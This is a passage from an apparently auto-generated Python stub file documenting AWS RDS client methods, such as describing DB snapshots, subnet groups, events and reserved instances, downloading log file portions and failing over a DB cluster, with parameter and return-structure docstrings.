:param MaxRecords: The maximum number of records to include in the response. If more records exist than the specified MaxRecords value, a pagination token called a marker is included in the response so that the remaining results can be retrieved.
Default: 100
Constraints: Minimum 20, maximum 100.
:type Marker: string
:param Marker: An optional pagination token provided by a previous DescribeDBSnapshots request. If this parameter is specified, the response includes only records beyond the marker, up to the value specified by MaxRecords .
:type IncludeShared: boolean
:param IncludeShared: Set this value to true to include shared manual DB snapshots from other AWS accounts that this AWS account has been given permission to copy or restore, otherwise set this value to false . The default is false .
You can give an AWS account permission to restore a manual DB snapshot from another AWS account by using the ModifyDBSnapshotAttribute API action.
:type IncludePublic: boolean
:param IncludePublic: Set this value to true to include manual DB snapshots that are public and can be copied or restored by any AWS account, otherwise set this value to false . The default is false .
You can share a manual DB snapshot as public by using the ModifyDBSnapshotAttribute API.
:rtype: dict
:return: {
'Marker': 'string',
'DBSnapshots': [
{
'DBSnapshotIdentifier': 'string',
'DBInstanceIdentifier': 'string',
'SnapshotCreateTime': datetime(2015, 1, 1),
'Engine': 'string',
'AllocatedStorage': 123,
'Status': 'string',
'Port': 123,
'AvailabilityZone': 'string',
'VpcId': 'string',
'InstanceCreateTime': datetime(2015, 1, 1),
'MasterUsername': 'string',
'EngineVersion': 'string',
'LicenseModel': 'string',
'SnapshotType': 'string',
'Iops': 123,
'OptionGroupName': 'string',
'PercentProgress': 123,
'SourceRegion': 'string',
'SourceDBSnapshotIdentifier': 'string',
'StorageType': 'string',
'TdeCredentialArn': 'string',
'Encrypted': True|False,
'KmsKeyId': 'string',
'DBSnapshotArn': 'string',
'Timezone': 'string',
'IAMDatabaseAuthenticationEnabled': True|False
},
]
}
:returns:
CreateDBSnapshot
DeleteDBSnapshot
"""
pass
def describe_db_subnet_groups(DBSubnetGroupName=None, Filters=None, MaxRecords=None, Marker=None):
"""
Returns a list of DBSubnetGroup descriptions. If a DBSubnetGroupName is specified, the list will contain only the descriptions of the specified DBSubnetGroup.
For an overview of CIDR ranges, go to the Wikipedia Tutorial .
See also: AWS API Documentation
Examples
This example lists information about the specified DB subnet group.
Expected Output:
:example: response = client.describe_db_subnet_groups(
DBSubnetGroupName='string',
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
],
MaxRecords=123,
Marker='string'
)
:type DBSubnetGroupName: string
:param DBSubnetGroupName: The name of the DB subnet group to return details for.
:type Filters: list
:param Filters: This parameter is not currently supported.
(dict) --This type is not currently supported.
Name (string) -- [REQUIRED]This parameter is not currently supported.
Values (list) -- [REQUIRED]This parameter is not currently supported.
(string) --
:type MaxRecords: integer
:param MaxRecords: The maximum number of records to include in the response. If more records exist than the specified MaxRecords value, a pagination token called a marker is included in the response so that the remaining results can be retrieved.
Default: 100
Constraints: Minimum 20, maximum 100.
:type Marker: string
:param Marker: An optional pagination token provided by a previous DescribeDBSubnetGroups request. If this parameter is specified, the response includes only records beyond the marker, up to the value specified by MaxRecords .
:rtype: dict
:return: {
'Marker': 'string',
'DBSubnetGroups': [
{
'DBSubnetGroupName': 'string',
'DBSubnetGroupDescription': 'string',
'VpcId': 'string',
'SubnetGroupStatus': 'string',
'Subnets': [
{
'SubnetIdentifier': 'string',
'SubnetAvailabilityZone': {
'Name': 'string'
},
'SubnetStatus': 'string'
},
],
'DBSubnetGroupArn': 'string'
},
]
}
:returns:
CreateDBSubnetGroup
ModifyDBSubnetGroup
DescribeDBSubnetGroups
DeleteDBSubnetGroup
"""
pass
def describe_engine_default_cluster_parameters(DBParameterGroupFamily=None, Filters=None, MaxRecords=None, Marker=None):
"""
Returns the default engine and system parameter information for the cluster database engine.
For more information on Amazon Aurora, see Aurora on Amazon RDS in the Amazon RDS User Guide.
See also: AWS API Documentation
Examples
This example lists default parameters for the specified DB cluster engine.
Expected Output:
:example: response = client.describe_engine_default_cluster_parameters(
DBParameterGroupFamily='string',
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
],
MaxRecords=123,
Marker='string'
)
:type DBParameterGroupFamily: string
:param DBParameterGroupFamily: [REQUIRED]
The name of the DB cluster parameter group family to return engine parameter information for.
:type Filters: list
:param Filters: This parameter is not currently supported.
(dict) --This type is not currently supported.
Name (string) -- [REQUIRED]This parameter is not currently supported.
Values (list) -- [REQUIRED]This parameter is not currently supported.
(string) --
:type MaxRecords: integer
:param MaxRecords: The maximum number of records to include in the response. If more records exist than the specified MaxRecords value, a pagination token called a marker is included in the response so that the remaining results can be retrieved.
Default: 100
Constraints: Minimum 20, maximum 100.
:type Marker: string
:param Marker: An optional pagination token provided by a previous DescribeEngineDefaultClusterParameters request. If this parameter is specified, the response includes only records beyond the marker, up to the value specified by MaxRecords .
:rtype: dict
:return: {
'EngineDefaults': {
'DBParameterGroupFamily': 'string',
'Marker': 'string',
'Parameters': [
{
'ParameterName': 'string',
'ParameterValue': 'string',
'Description': 'string',
'Source': 'string',
'ApplyType': 'string',
'DataType': 'string',
'AllowedValues': 'string',
'IsModifiable': True|False,
'MinimumEngineVersion': 'string',
'ApplyMethod': 'immediate'|'pending-reboot'
},
]
}
}
"""
pass
def describe_engine_default_parameters(DBParameterGroupFamily=None, Filters=None, MaxRecords=None, Marker=None):
"""
Returns the default engine and system parameter information for the specified database engine.
See also: AWS API Documentation
Examples
This example lists default parameters for the specified DB engine.
Expected Output:
:example: response = client.describe_engine_default_parameters(
DBParameterGroupFamily='string',
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
],
MaxRecords=123,
Marker='string'
)
:type DBParameterGroupFamily: string
:param DBParameterGroupFamily: [REQUIRED]
The name of the DB parameter group family.
:type Filters: list
:param Filters: Not currently supported.
(dict) --This type is not currently supported.
Name (string) -- [REQUIRED]This parameter is not currently supported.
Values (list) -- [REQUIRED]This parameter is not currently supported.
(string) --
:type MaxRecords: integer
:param MaxRecords: The maximum number of records to include in the response. If more records exist than the specified MaxRecords value, a pagination token called a marker is included in the response so that the remaining results can be retrieved.
Default: 100
Constraints: Minimum 20, maximum 100.
:type Marker: string
:param Marker: An optional pagination token provided by a previous DescribeEngineDefaultParameters request. If this parameter is specified, the response includes only records beyond the marker, up to the value specified by MaxRecords .
:rtype: dict
:return: {
'EngineDefaults': {
'DBParameterGroupFamily': 'string',
'Marker': 'string',
'Parameters': [
{
'ParameterName': 'string',
'ParameterValue': 'string',
'Description': 'string',
'Source': 'string',
'ApplyType': 'string',
'DataType': 'string',
'AllowedValues': 'string',
'IsModifiable': True|False,
'MinimumEngineVersion': 'string',
'ApplyMethod': 'immediate'|'pending-reboot'
},
]
}
}
"""
pass
def describe_event_categories(SourceType=None, Filters=None):
"""
Displays a list of categories for all event source types, or, if specified, for a specified source type. You can see a list of the event categories and source types in the Events topic in the Amazon RDS User Guide.
See also: AWS API Documentation
Examples
This example lists all DB instance event categories.
Expected Output:
:example: response = client.describe_event_categories(
SourceType='string',
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
]
)
:type SourceType: string
:param SourceType: The type of source that will be generating the events.
Valid values: db-instance | db-parameter-group | db-security-group | db-snapshot
:type Filters: list
:param Filters: This parameter is not currently supported.
(dict) --This type is not currently supported.
Name (string) -- [REQUIRED]This parameter is not currently supported.
Values (list) -- [REQUIRED]This parameter is not currently supported.
(string) --
:rtype: dict
:return: {
'EventCategoriesMapList': [
{
'SourceType': 'string',
'EventCategories': [
'string',
]
},
]
}
:returns:
(string) --
"""
pass
def describe_event_subscriptions(SubscriptionName=None, Filters=None, MaxRecords=None, Marker=None):
"""
Lists all the subscription descriptions for a customer account. The description for a subscription includes SubscriptionName, SNSTopicARN, CustomerID, SourceType, SourceID, CreationTime, and Status.
If you specify a SubscriptionName, lists the description for that subscription.
See also: AWS API Documentation
Examples
This example lists information for the specified DB event notification subscription.
Expected Output:
:example: response = client.describe_event_subscriptions(
SubscriptionName='string',
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
],
MaxRecords=123,
Marker='string'
)
:type SubscriptionName: string
:param SubscriptionName: The name of the RDS event notification subscription you want to describe.
:type Filters: list
:param Filters: This parameter is not currently supported.
(dict) --This type is not currently supported.
Name (string) -- [REQUIRED]This parameter is not currently supported.
Values (list) -- [REQUIRED]This parameter is not currently supported.
(string) --
:type MaxRecords: integer
:param MaxRecords: The maximum number of records to include in the response. If more records exist than the specified MaxRecords value, a pagination token called a marker is included in the response so that the remaining results can be retrieved.
Default: 100
Constraints: Minimum 20, maximum 100.
:type Marker: string
:param Marker: An optional pagination token provided by a previous DescribeOrderableDBInstanceOptions request. If this parameter is specified, the response includes only records beyond the marker, up to the value specified by MaxRecords .
:rtype: dict
:return: {
'Marker': 'string',
'EventSubscriptionsList': [
{
'CustomerAwsId': 'string',
'CustSubscriptionId': 'string',
'SnsTopicArn': 'string',
'Status': 'string',
'SubscriptionCreationTime': 'string',
'SourceType': 'string',
'SourceIdsList': [
'string',
],
'EventCategoriesList': [
'string',
],
'Enabled': True|False,
'EventSubscriptionArn': 'string'
},
]
}
:returns:
(string) --
"""
pass
def describe_events(SourceIdentifier=None, SourceType=None, StartTime=None, EndTime=None, Duration=None, EventCategories=None, Filters=None, MaxRecords=None, Marker=None):
"""
Returns events related to DB instances, DB security groups, DB snapshots, and DB parameter groups for the past 14 days. Events specific to a particular DB instance, DB security group, database snapshot, or DB parameter group can be obtained by providing the name as a parameter. By default, the past hour of events are returned.
See also: AWS API Documentation
Examples
This example lists information for all backup-related events for the specified DB instance for the past 7 days (7 days * 24 hours * 60 minutes = 10,080 minutes).
Expected Output:
:example: response = client.describe_events(
SourceIdentifier='string',
SourceType='db-instance'|'db-parameter-group'|'db-security-group'|'db-snapshot'|'db-cluster'|'db-cluster-snapshot',
StartTime=datetime(2015, 1, 1),
EndTime=datetime(2015, 1, 1),
Duration=123,
EventCategories=[
'string',
],
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
],
MaxRecords=123,
Marker='string'
)
:type SourceIdentifier: string
:param SourceIdentifier: The identifier of the event source for which events will be returned. If not specified, then all sources are included in the response.
Constraints:
If SourceIdentifier is supplied, SourceType must also be provided.
If the source type is DBInstance , then a DBInstanceIdentifier must be supplied.
If the source type is DBSecurityGroup , a DBSecurityGroupName must be supplied.
If the source type is DBParameterGroup , a DBParameterGroupName must be supplied.
If the source type is DBSnapshot , a DBSnapshotIdentifier must be supplied.
Cannot end with a hyphen or contain two consecutive hyphens.
:type SourceType: string
:param SourceType: The event source to retrieve events for. If no value is specified, all events are returned.
:type StartTime: datetime
:param StartTime: The beginning of the time interval to retrieve events for, specified in ISO 8601 format. For more information about ISO 8601, go to the ISO8601 Wikipedia page.
Example: 2009-07-08T18:00Z
:type EndTime: datetime
:param EndTime: The end of the time interval for which to retrieve events, specified in ISO 8601 format. For more information about ISO 8601, go to the ISO8601 Wikipedia page.
Example: 2009-07-08T18:00Z
:type Duration: integer
:param Duration: The number of minutes to retrieve events for.
Default: 60
:type EventCategories: list
:param EventCategories: A list of event categories that trigger notifications for a event notification subscription.
(string) --
:type Filters: list
:param Filters: This parameter is not currently supported.
(dict) --This type is not currently supported.
Name (string) -- [REQUIRED]This parameter is not currently supported.
Values (list) -- [REQUIRED]This parameter is not currently supported.
(string) --
:type MaxRecords: integer
:param MaxRecords: The maximum number of records to include in the response. If more records exist than the specified MaxRecords value, a pagination token called a marker is included in the response so that the remaining results can be retrieved.
Default: 100
Constraints: Minimum 20, maximum 100.
:type Marker: string
:param Marker: An optional pagination token provided by a previous DescribeEvents request. If this parameter is specified, the response includes only records beyond the marker, up to the value specified by MaxRecords .
:rtype: dict
:return: {
'Marker': 'string',
'Events': [
{
'SourceIdentifier': 'string',
'SourceType': 'db-instance'|'db-parameter-group'|'db-security-group'|'db-snapshot'|'db-cluster'|'db-cluster-snapshot',
'Message': 'string',
'EventCategories': [
'string',
],
'Date': datetime(2015, 1, 1),
'SourceArn': 'string'
},
]
}
:returns:
(string) --
"""
pass
def describe_option_group_options(EngineName=None, MajorEngineVersion=None, Filters=None, MaxRecords=None, Marker=None):
"""
Describes all available options.
See also: AWS API Documentation
Examples
This example lists information for all option group options for the specified DB engine.
Expected Output:
:example: response = client.describe_option_group_options(
EngineName='string',
MajorEngineVersion='string',
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
],
MaxRecords=123,
Marker='string'
)
:type EngineName: string
:param EngineName: [REQUIRED]
A required parameter. Options available for the given engine name will be described.
:type MajorEngineVersion: string
:param MajorEngineVersion: If specified, filters the results to include only options for the specified major engine version.
:type Filters: list
:param Filters: This parameter is not currently supported.
(dict) --This type is not currently supported.
Name (string) -- [REQUIRED]This parameter is not currently supported.
Values (list) -- [REQUIRED]This parameter is not currently supported.
(string) --
:type MaxRecords: integer
:param MaxRecords: The maximum number of records to include in the response. If more records exist than the specified MaxRecords value, a pagination token called a marker is included in the response so that the remaining results can be retrieved.
Default: 100
Constraints: Minimum 20, maximum 100.
:type Marker: string
:param Marker: An optional pagination token provided by a previous request. If this parameter is specified, the response includes only records beyond the marker, up to the value specified by MaxRecords .
:rtype: dict
:return: {
'OptionGroupOptions': [
{
'Name': 'string',
'Description': 'string',
'EngineName': 'string',
'MajorEngineVersion': 'string',
'MinimumRequiredMinorEngineVersion': 'string',
'PortRequired': True|False,
'DefaultPort': 123,
'OptionsDependedOn': [
'string',
],
'OptionsConflictsWith': [
'string',
],
'Persistent': True|False,
'Permanent': True|False,
'OptionGroupOptionSettings': [
{
'SettingName': 'string',
'SettingDescription': 'string',
'DefaultValue': 'string',
'ApplyType': 'string',
'AllowedValues': 'string',
'IsModifiable': True|False
},
],
'OptionGroupOptionVersions': [
{
'Version': 'string',
'IsDefault': True|False
},
]
},
],
'Marker': 'string'
}
:returns:
(string) --
"""
pass
def describe_option_groups(OptionGroupName=None, Filters=None, Marker=None, MaxRecords=None, EngineName=None, MajorEngineVersion=None):
"""
Describes the available option groups.
See also: AWS API Documentation
Examples
This example lists information for all option groups for the specified DB engine.
Expected Output:
:example: response = client.describe_option_groups(
OptionGroupName='string',
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
],
Marker='string',
MaxRecords=123,
EngineName='string',
MajorEngineVersion='string'
)
:type OptionGroupName: string
:param OptionGroupName: The name of the option group to describe. Cannot be supplied together with EngineName or MajorEngineVersion.
:type Filters: list
:param Filters: This parameter is not currently supported.
(dict) --This type is not currently supported.
Name (string) -- [REQUIRED]This parameter is not currently supported.
Values (list) -- [REQUIRED]This parameter is not currently supported.
(string) --
:type Marker: string
:param Marker: An optional pagination token provided by a previous DescribeOptionGroups request. If this parameter is specified, the response includes only records beyond the marker, up to the value specified by MaxRecords .
:type MaxRecords: integer
:param MaxRecords: The maximum number of records to include in the response. If more records exist than the specified MaxRecords value, a pagination token called a marker is included in the response so that the remaining results can be retrieved.
Default: 100
Constraints: Minimum 20, maximum 100.
:type EngineName: string
:param EngineName: Filters the list of option groups to only include groups associated with a specific database engine.
:type MajorEngineVersion: string
:param MajorEngineVersion: Filters the list of option groups to only include groups associated with a specific database engine version. If specified, then EngineName must also be specified.
:rtype: dict
:return: {
'OptionGroupsList': [
{
'OptionGroupName': 'string',
'OptionGroupDescription': 'string',
'EngineName': 'string',
'MajorEngineVersion': 'string',
'Options': [
{
'OptionName': 'string',
'OptionDescription': 'string',
'Persistent': True|False,
'Permanent': True|False,
'Port': 123,
'OptionVersion': 'string',
'OptionSettings': [
{
'Name': 'string',
'Value': 'string',
'DefaultValue': 'string',
'Description': 'string',
'ApplyType': 'string',
'DataType': 'string',
'AllowedValues': 'string',
'IsModifiable': True|False,
'IsCollection': True|False
},
],
'DBSecurityGroupMemberships': [
{
'DBSecurityGroupName': 'string',
'Status': 'string'
},
],
'VpcSecurityGroupMemberships': [
{
'VpcSecurityGroupId': 'string',
'Status': 'string'
},
]
},
],
'AllowsVpcAndNonVpcInstanceMemberships': True|False,
'VpcId': 'string',
'OptionGroupArn': 'string'
},
],
'Marker': 'string'
}
:returns:
ModifyDBInstance
RebootDBInstance
RestoreDBInstanceFromDBSnapshot
RestoreDBInstanceToPointInTime
"""
pass
def describe_orderable_db_instance_options(Engine=None, EngineVersion=None, DBInstanceClass=None, LicenseModel=None, Vpc=None, Filters=None, MaxRecords=None, Marker=None):
"""
Returns a list of orderable DB instance options for the specified engine.
See also: AWS API Documentation
Examples
This example lists information for all orderable DB instance options for the specified DB engine, engine version, DB instance class, license model, and VPC settings.
Expected Output:
:example: response = client.describe_orderable_db_instance_options(
Engine='string',
EngineVersion='string',
DBInstanceClass='string',
LicenseModel='string',
Vpc=True|False,
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
],
MaxRecords=123,
Marker='string'
)
:type Engine: string
:param Engine: [REQUIRED]
The name of the engine to retrieve DB instance options for.
:type EngineVersion: string
:param EngineVersion: The engine version filter value. Specify this parameter to show only the available offerings matching the specified engine version.
:type DBInstanceClass: string
:param DBInstanceClass: The DB instance class filter value. Specify this parameter to show only the available offerings matching the specified DB instance class.
:type LicenseModel: string
:param LicenseModel: The license model filter value. Specify this parameter to show only the available offerings matching the specified license model.
:type Vpc: boolean
:param Vpc: The VPC filter value. Specify this parameter to show only the available VPC or non-VPC offerings.
:type Filters: list
:param Filters: This parameter is not currently supported.
(dict) --This type is not currently supported.
Name (string) -- [REQUIRED]This parameter is not currently supported.
Values (list) -- [REQUIRED]This parameter is not currently supported.
(string) --
:type MaxRecords: integer
:param MaxRecords: The maximum number of records to include in the response. If more records exist than the specified MaxRecords value, a pagination token called a marker is included in the response so that the remaining results can be retrieved.
Default: 100
Constraints: Minimum 20, maximum 100.
:type Marker: string
:param Marker: An optional pagination token provided by a previous DescribeOrderableDBInstanceOptions request. If this parameter is specified, the response includes only records beyond the marker, up to the value specified by MaxRecords .
:rtype: dict
:return: {
'OrderableDBInstanceOptions': [
{
'Engine': 'string',
'EngineVersion': 'string',
'DBInstanceClass': 'string',
'LicenseModel': 'string',
'AvailabilityZones': [
{
'Name': 'string'
},
],
'MultiAZCapable': True|False,
'ReadReplicaCapable': True|False,
'Vpc': True|False,
'SupportsStorageEncryption': True|False,
'StorageType': 'string',
'SupportsIops': True|False,
'SupportsEnhancedMonitoring': True|False,
'SupportsIAMDatabaseAuthentication': True|False
},
],
'Marker': 'string'
}
:returns:
OrderableDBInstanceOption
"""
pass
def describe_pending_maintenance_actions(ResourceIdentifier=None, Filters=None, Marker=None, MaxRecords=None):
"""
Returns a list of resources (for example, DB instances) that have at least one pending maintenance action.
See also: AWS API Documentation
Examples
This example lists information for all pending maintenance actions for the specified DB instance.
Expected Output:
:example: response = client.describe_pending_maintenance_actions(
ResourceIdentifier='string',
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
],
Marker='string',
MaxRecords=123
)
:type ResourceIdentifier: string
:param ResourceIdentifier: The ARN of a resource to return pending maintenance actions for.
:type Filters: list
:param Filters: A filter that specifies one or more resources to return pending maintenance actions for.
Supported filters:
db-cluster-id - Accepts DB cluster identifiers and DB cluster Amazon Resource Names (ARNs). The results list will only include pending maintenance actions for the DB clusters identified by these ARNs.
db-instance-id - Accepts DB instance identifiers and DB instance ARNs. The results list will only include pending maintenance actions for the DB instances identified by these ARNs.
(dict) --This type is not currently supported.
Name (string) -- [REQUIRED]This parameter is not currently supported.
Values (list) -- [REQUIRED]This parameter is not currently supported.
(string) --
:type Marker: string
:param Marker: An optional pagination token provided by a previous DescribePendingMaintenanceActions request. If this parameter is specified, the response includes only records beyond the marker, up to a number of records specified by MaxRecords .
:type MaxRecords: integer
:param MaxRecords: The maximum number of records to include in the response. If more records exist than the specified MaxRecords value, a pagination token called a marker is included in the response so that the remaining results can be retrieved.
Default: 100
Constraints: Minimum 20, maximum 100.
:rtype: dict
:return: {
'PendingMaintenanceActions': [
{
'ResourceIdentifier': 'string',
'PendingMaintenanceActionDetails': [
{
'Action': 'string',
'AutoAppliedAfterDate': datetime(2015, 1, 1),
'ForcedApplyDate': datetime(2015, 1, 1),
'OptInStatus': 'string',
'CurrentApplyDate': datetime(2015, 1, 1),
'Description': 'string'
},
]
},
],
'Marker': 'string'
}
"""
pass
def describe_reserved_db_instances(ReservedDBInstanceId=None, ReservedDBInstancesOfferingId=None, DBInstanceClass=None, Duration=None, ProductDescription=None, OfferingType=None, MultiAZ=None, Filters=None, MaxRecords=None, Marker=None):
"""
Returns information about reserved DB instances for this account, or about a specified reserved DB instance.
See also: AWS API Documentation
Examples
This example lists information for all reserved DB instances for the specified DB instance class, duration, product, offering type, and availability zone settings.
Expected Output:
:example: response = client.describe_reserved_db_instances(
ReservedDBInstanceId='string',
ReservedDBInstancesOfferingId='string',
DBInstanceClass='string',
Duration='string',
ProductDescription='string',
OfferingType='string',
MultiAZ=True|False,
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
],
MaxRecords=123,
Marker='string'
)
:type ReservedDBInstanceId: string
:param ReservedDBInstanceId: The reserved DB instance identifier filter value. Specify this parameter to show only the reservation that matches the specified reservation ID.
:type ReservedDBInstancesOfferingId: string
:param ReservedDBInstancesOfferingId: The offering identifier filter value. Specify this parameter to show only purchased reservations matching the specified offering identifier.
:type DBInstanceClass: string
:param DBInstanceClass: The DB instance class filter value. Specify this parameter to show only those reservations matching the specified DB instances class.
:type Duration: string
:param Duration: The duration filter value, specified in years or seconds. Specify this parameter to show only reservations for this duration.
Valid Values: 1 | 3 | 31536000 | 94608000
:type ProductDescription: string
:param ProductDescription: The product description filter value. Specify this parameter to show only those reservations matching the specified product description.
:type OfferingType: string
:param OfferingType: The offering type filter value. Specify this parameter to show only the available offerings matching the specified offering type.
Valid Values: 'Partial Upfront' | 'All Upfront' | 'No Upfront'
:type MultiAZ: boolean
:param MultiAZ: The Multi-AZ filter value. Specify this parameter to show only those reservations matching the specified Multi-AZ parameter.
:type Filters: list
:param Filters: This parameter is not currently supported.
(dict) --This type is not currently supported.
Name (string) -- [REQUIRED]This parameter is not currently supported.
Values (list) -- [REQUIRED]This parameter is not currently supported.
(string) --
:type MaxRecords: integer
:param MaxRecords: The maximum number of records to include in the response. If more than the MaxRecords value is available, a pagination token called a marker is included in the response so that the following results can be retrieved.
Default: 100
Constraints: Minimum 20, maximum 100.
:type Marker: string
:param Marker: An optional pagination token provided by a previous request. If this parameter is specified, the response includes only records beyond the marker, up to the value specified by MaxRecords .
:rtype: dict
:return: {
'Marker': 'string',
'ReservedDBInstances': [
{
'ReservedDBInstanceId': 'string',
'ReservedDBInstancesOfferingId': 'string',
'DBInstanceClass': 'string',
'StartTime': datetime(2015, 1, 1),
'Duration': 123,
'FixedPrice': 123.0,
'UsagePrice': 123.0,
'CurrencyCode': 'string',
'DBInstanceCount': 123,
'ProductDescription': 'string',
'OfferingType': 'string',
'MultiAZ': True|False,
'State': 'string',
'RecurringCharges': [
{
'RecurringChargeAmount': 123.0,
'RecurringChargeFrequency': 'string'
},
],
'ReservedDBInstanceArn': 'string'
},
]
}
"""
pass
def describe_reserved_db_instances_offerings(ReservedDBInstancesOfferingId=None, DBInstanceClass=None, Duration=None, ProductDescription=None, OfferingType=None, MultiAZ=None, Filters=None, MaxRecords=None, Marker=None):
"""
Lists available reserved DB instance offerings.
See also: AWS API Documentation
Examples
This example lists information for all reserved DB instance offerings for the specified DB instance class, duration, product, offering type, and availability zone settings.
Expected Output:
:example: response = client.describe_reserved_db_instances_offerings(
ReservedDBInstancesOfferingId='string',
DBInstanceClass='string',
Duration='string',
ProductDescription='string',
OfferingType='string',
MultiAZ=True|False,
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
],
MaxRecords=123,
Marker='string'
)
:type ReservedDBInstancesOfferingId: string
:param ReservedDBInstancesOfferingId: The offering identifier filter value. Specify this parameter to show only the available offering that matches the specified reservation identifier.
Example: 438012d3-4052-4cc7-b2e3-8d3372e0e706
:type DBInstanceClass: string
:param DBInstanceClass: The DB instance class filter value. Specify this parameter to show only the available offerings matching the specified DB instance class.
:type Duration: string
:param Duration: Duration filter value, specified in years or seconds. Specify this parameter to show only reservations for this duration.
Valid Values: 1 | 3 | 31536000 | 94608000
:type ProductDescription: string
:param ProductDescription: Product description filter value. Specify this parameter to show only the available offerings matching the specified product description.
:type OfferingType: string
:param OfferingType: The offering type filter value. Specify this parameter to show only the available offerings matching the specified offering type.
Valid Values: 'Partial Upfront' | 'All Upfront' | 'No Upfront'
:type MultiAZ: boolean
:param MultiAZ: The Multi-AZ filter value. Specify this parameter to show only the available offerings matching the specified Multi-AZ parameter.
:type Filters: list
:param Filters: This parameter is not currently supported.
(dict) --This type is not currently supported.
Name (string) -- [REQUIRED]This parameter is not currently supported.
Values (list) -- [REQUIRED]This parameter is not currently supported.
(string) --
:type MaxRecords: integer
:param MaxRecords: The maximum number of records to include in the response. If more than the MaxRecords value is available, a pagination token called a marker is included in the response so that the following results can be retrieved.
Default: 100
Constraints: Minimum 20, maximum 100.
:type Marker: string
:param Marker: An optional pagination token provided by a previous request. If this parameter is specified, the response includes only records beyond the marker, up to the value specified by MaxRecords .
:rtype: dict
:return: {
'Marker': 'string',
'ReservedDBInstancesOfferings': [
{
'ReservedDBInstancesOfferingId': 'string',
'DBInstanceClass': 'string',
'Duration': 123,
'FixedPrice': 123.0,
'UsagePrice': 123.0,
'CurrencyCode': 'string',
'ProductDescription': 'string',
'OfferingType': 'string',
'MultiAZ': True|False,
'RecurringCharges': [
{
'RecurringChargeAmount': 123.0,
'RecurringChargeFrequency': 'string'
},
]
},
]
}
"""
pass
def describe_source_regions(RegionName=None, MaxRecords=None, Marker=None, Filters=None):
"""
Returns a list of the source AWS regions where the current AWS region can create a Read Replica or copy a DB snapshot from. This API action supports pagination.
See also: AWS API Documentation
Examples
To list the AWS regions where a Read Replica can be created.
Expected Output:
:example: response = client.describe_source_regions(
RegionName='string',
MaxRecords=123,
Marker='string',
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
]
)
:type RegionName: string
:param RegionName: The source region name. For example, us-east-1 .
Constraints:
Must specify a valid AWS Region name.
:type MaxRecords: integer
:param MaxRecords: The maximum number of records to include in the response. If more records exist than the specified MaxRecords value, a pagination token called a marker is included in the response so that the remaining results can be retrieved.
Default: 100
Constraints: Minimum 20, maximum 100.
:type Marker: string
:param Marker: An optional pagination token provided by a previous DescribeSourceRegions request. If this parameter is specified, the response includes only records beyond the marker, up to the value specified by MaxRecords .
:type Filters: list
:param Filters: This parameter is not currently supported.
(dict) --This type is not currently supported.
Name (string) -- [REQUIRED]This parameter is not currently supported.
Values (list) -- [REQUIRED]This parameter is not currently supported.
(string) --
:rtype: dict
:return: {
'Marker': 'string',
'SourceRegions': [
{
'RegionName': 'string',
'Endpoint': 'string',
'Status': 'string'
},
]
}
"""
pass
def download_db_log_file_portion(DBInstanceIdentifier=None, LogFileName=None, Marker=None, NumberOfLines=None):
"""
Downloads all or a portion of the specified log file, up to 1 MB in size.
See also: AWS API Documentation
Examples
This example lists information for the specified log file for the specified DB instance.
Expected Output:
:example: response = client.download_db_log_file_portion(
DBInstanceIdentifier='string',
LogFileName='string',
Marker='string',
NumberOfLines=123
)
:type DBInstanceIdentifier: string
:param DBInstanceIdentifier: [REQUIRED]
The customer-assigned name of the DB instance that contains the log files you want to list.
Constraints:
Must contain from 1 to 63 alphanumeric characters or hyphens
First character must be a letter
Cannot end with a hyphen or contain two consecutive hyphens
:type LogFileName: string
:param LogFileName: [REQUIRED]
The name of the log file to be downloaded.
:type Marker: string
:param Marker: The pagination token provided in the previous request or '0'. If the Marker parameter is specified the response includes only records beyond the marker until the end of the file or up to NumberOfLines.
:type NumberOfLines: integer
:param NumberOfLines: The number of lines to download. If the number of lines specified results in a file over 1 MB in size, the file will be truncated at 1 MB in size.
If the NumberOfLines parameter is specified, then the block of lines returned can be from the beginning or the end of the log file, depending on the value of the Marker parameter.
If neither Marker or NumberOfLines are specified, the entire log file is returned up to a maximum of 10000 lines, starting with the most recent log entries first.
If NumberOfLines is specified and Marker is not specified, then the most recent lines from the end of the log file are returned.
If Marker is specified as '0', then the specified number of lines from the beginning of the log file are returned.
You can download the log file in blocks of lines by specifying the size of the block using the NumberOfLines parameter, and by specifying a value of '0' for the Marker parameter in your first request. Include the Marker value returned in the response as the Marker value for the next request, continuing until the AdditionalDataPending response element returns false.
:rtype: dict
:return: {
'LogFileData': 'string',
'Marker': 'string',
'AdditionalDataPending': True|False
}
"""
pass
def failover_db_cluster(DBClusterIdentifier=None, TargetDBInstanceIdentifier=None):
"""
Forces a failover for a DB cluster.
A failover for a DB cluster promotes one of the Aurora Replicas (read-only instances) in the DB cluster to be the primary instance (the cluster writer).
Amazon Aurora will automatically fail over to an Aurora Replica, if one exists, when the primary instance fails. You can force a failover when you want to simulate a failure of a primary instance for testing. Because each instance in a DB cluster has its own endpoint address, you will need to clean up and re-establish any existing connections that use those endpoint addresses when the failover is complete.
For more information on Amazon Aurora, see Aurora on Amazon RDS in the Amazon RDS User Guide.
See also: AWS API Documentation
Examples
This example performs a failover for the specified DB cluster to the specified DB instance.
Expected Output:
:example: response = client.failover_db_cluster(
DBClusterIdentifier='string',
TargetDBInstanceIdentifier='string'
)
:type DBClusterIdentifier: string
:param DBClusterIdentifier: A DB cluster identifier to force a failover for. This parameter is not case-sensitive.
Constraints:
Must contain from 1 to 63 alphanumeric characters or hyphens
First character must be a letter
Cannot end with a hyphen or contain two consecutive hyphens
:type TargetDBInstanceIdentifier: string
:param TargetDBInstanceIdentifier: The name of the instance to promote to the primary instance.
You must specify the instance identifier for an Aurora Replica in the DB cluster. For example, mydbcluster-replica1 .
:rtype: dict
:return: {
'DBCluster': {
'AllocatedStorage': 123,
'AvailabilityZones': [
'string',
],
'BackupRetentionPeriod': 123,
'CharacterSetName': 'string',
'DatabaseName': 'string',
'DBClusterIdentifier': 'string',
'DBClusterParameterGroup': 'string',
'DBSubnetGroup': 'string',
'Status': 'string',
